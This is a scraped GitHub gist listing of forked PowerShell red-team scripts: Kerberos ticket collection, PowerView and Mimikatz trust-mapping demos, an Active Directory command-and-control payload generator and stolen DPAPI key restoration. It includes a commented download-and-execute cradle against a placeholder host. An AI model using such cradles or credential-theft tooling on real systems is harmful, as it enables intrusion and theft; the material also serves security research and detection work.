Az H0K5
H0K5
/ Get-KerberosTicketGrantingTicket.ps1
Created
December 6, 2017 15:44
— forked from jaredcatkinson/Get-KerberosTicketGrantingTicket.ps1
Kerberos Ticket Granting Ticket Collection Script and Golden Ticket Detection Tests
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-KerberosTicketGrantingTicket | |
| { | |
| <# | |
| .SYNOPSIS | |
| Gets the Kerberos Tickets Granting Tickets from all Logon Sessions | |
| .DESCRIPTION | |
| Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associate Kerberos Ticket Granting Tickets. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $GroupData = @{} | |
| $UserData = @{} | |
| $ServerData = @{} | |
| Import-CSV .\DomainGroups.csv | ForEach-Object { | |
| if($GroupData[$_.GroupName]) { | |
| $_.GroupName = $GroupData[$_.GroupName] | |
| } | |
| else { | |
| $guid = ([guid]::NewGuid()).Guid |
H0K5
/ PSConfEU.ps1
Created
December 6, 2017 15:40
— forked from HarmJ0y/PSConfEU.ps1
PSConfEU PowerView demo
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Import PowerView into memory without touching disk | |
| # IEX (New-Object Net.WebClient).DownloadString('http://HOST/powerview.ps1') | |
| ################################### | |
| # Hunting for Users | |
| ################################### | |
| # search for administrator groups |
H0K5
/ ADC2.ps1
Created
December 6, 2017 15:40
— forked from HarmJ0y/ADC2.ps1
Command and Control channel through Active Directory Object Properties
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Requires -Version 2 | |
| function New-ADPayload { | |
| <# | |
| .SYNOPSIS | |
| Stores PowerShell logic in the mSMQSignCertificates of the specified -TriggerAccount and generates | |
| a one-line launcher. | |
| Author: @harmj0y |
H0K5
/ ADC2.ps1
Created
December 6, 2017 15:40
— forked from HarmJ0y/ADC2.ps1
Command and Control channel through Active Directory Object Properties
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Requires -Version 2 | |
| function New-ADPayload { | |
| <# | |
| .SYNOPSIS | |
| Stores PowerShell logic in the mSMQSignCertificates of the specified -TriggerAccount and generates | |
| a one-line launcher. | |
| Author: @harmj0y |
H0K5
/ Restore-UserDPAPI.ps1
Created
December 6, 2017 15:40
— forked from HarmJ0y/Restore-UserDPAPI.ps1
Restore a user's stolen DPAPI master key folder and optional KeePass DPAPI data blob.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Restore-UserDPAPI { | |
| <# | |
| .SYNOPSIS | |
| Restores a user account's DPAPI master key on a new system. | |
| Author: @harmj0y | |
| License: BSD 3-Clause | |
| Required Dependencies: None | |
| Optional Dependencies: None |
H0K5
/ rotate.ps1
Created
December 6, 2017 15:40
— forked from HarmJ0y/rotate.ps1
PowerShell binary rotate right/left on individual bytes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Rotate-Byte { | |
| <# | |
| .SYNOPSIS | |
| Performs left/right binary rotation on individual bytes. | |
| Author: @harmj0y | |
| .DESCRIPTION | |
| Implements the logic to perform per-byte binary rotates right and left. |
H0K5
/ EncryptedStoreTests.ps1
Created
December 6, 2017 15:40
— forked from HarmJ0y/EncryptedStoreTests.ps1
Encrypted Store Tests
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $RSA = New-RSAKeyPair | |
| # local tests | |
| $ComputerName = 'localhost' | |
| $StorePath = 'C:\Temp\temp.bin' | |
| Write-Host "`n[$ComputerName] AES Storepath : $StorePath" | |
| ".\secret.txt" | Write-EncryptedStore -StorePath $StorePath -Key 'Password123!' | |
| Read-EncryptedStore -StorePath $StorePath -Key 'Password123!' -List | |
| Get-EncryptedStoreData -StorePath $StorePath | Remove-EncryptedStore |
H0K5
/ 44con_demo.ps1
Created
December 6, 2017 15:40
— forked from HarmJ0y/44con_demo.ps1
Demo for the 44con "Trusts You Might Have Missed" presentation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # import PowerView and Invoke-Mimikatz | |
| Import-Module .\powerview.ps1 | |
| Import-Module .\mimikatz.ps1 | |
| # map all reachable domain trusts | |
| Invoke-MapDomainTrust | |
| # enumerate groups with 'foreign' users users, and convert the foreign principal SIDs to names | |
| Find-ForeignGroup -Domain external.local | |
| Find-ForeignGroup -Domain external.local | Select-Object -ExpandProperty UserName | Convert-SidToName |
H0K5
/ RC4.ps1
Created
December 6, 2017 15:40
— forked from HarmJ0y/RC4.ps1
PowerShell RC4 Implementation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function ConvertTo-Rc4ByteStream { | |
| <# | |
| .SYNOPSIS | |
| Converts an input byte array to a RC4 cipher stream using the specified key. | |
| Author: @harmj0y | |
| License: BSD 3-Clause | |
| Required Dependencies: None | |
| Optional Dependencies: None |